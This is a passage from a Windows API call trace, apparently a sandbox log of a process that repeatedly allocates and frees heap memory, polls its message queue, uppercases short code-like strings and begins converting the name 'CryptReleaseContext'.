hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.346] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0101.350] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0101.350] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0101.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0101.350] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0101.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0101.351] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0101.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0101.351] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0101.352] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0101.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0101.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9718 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74508 [0101.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0101.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0101.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0101.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0101.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0101.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0101.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74508 | out: hHeap=0x2af0000) returned 1 [0101.355] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.355] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0101.355] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.355] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.355] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.355] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.355] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0101.356] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0101.356] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.356] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.356] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.356] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.356] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0101.356] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.356] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0101.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0101.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0101.357] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.357] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.357] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, 